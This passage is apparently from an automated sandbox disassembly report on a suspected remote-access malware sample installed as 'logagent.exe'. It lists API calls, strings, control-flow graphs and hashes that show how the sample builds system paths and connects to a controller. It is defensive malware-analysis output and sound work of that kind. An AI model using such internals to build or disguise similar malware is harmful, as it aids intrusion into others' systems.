                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro), ref: 00409E8E
                                    • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?), ref: 0040CBCC
                                  • GetTickCount.KERNEL32 ref: 0040CC20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000), ref: 0040CD07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                  • CreateThread.KERNEL32 ref: 0040D240
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                  • atoi.MSVCRT ref: 0040D285
                                  • Sleep.KERNELBASE(00000000), ref: 0040D293
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                  • String ID: %I64u$2.7.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                  • API String ID: 43808216-1859881042
                                  • Opcode ID: c8771bf38c1e98cf7186b6ba4d9f43e285e297f6f0f4a789da87c820c5ea5611
                                  • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                  • Opcode Fuzzy Hash: c8771bf38c1e98cf7186b6ba4d9f43e285e297f6f0f4a789da87c820c5ea5611
                                  • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 667 4135de-4135fe ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z 668 413731-4137d4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ GetLongPathNameW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z * 2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z * 2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 5 667->668 669 413604 667->669 670 413615-413632 call 412100 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z 669->670 671 413634-413639 669->671 672 413714-413719 669->672 673 413648-41364f call 412aeb 669->673 674 41360b-413610 669->674 675 41371b 669->675 676 41370d-413712 669->676 677 41363e-413643 669->677 685 4136aa-4136b0 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 670->685 678 413720-41372b _wgetenv ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 671->678 672->678 683 413651-4136a7 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 673->683 684 4136b2-41370b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z _wgetenv ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 673->684 674->678 675->678 676->678 677->678 678->668 683->685 684->685 685->668
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

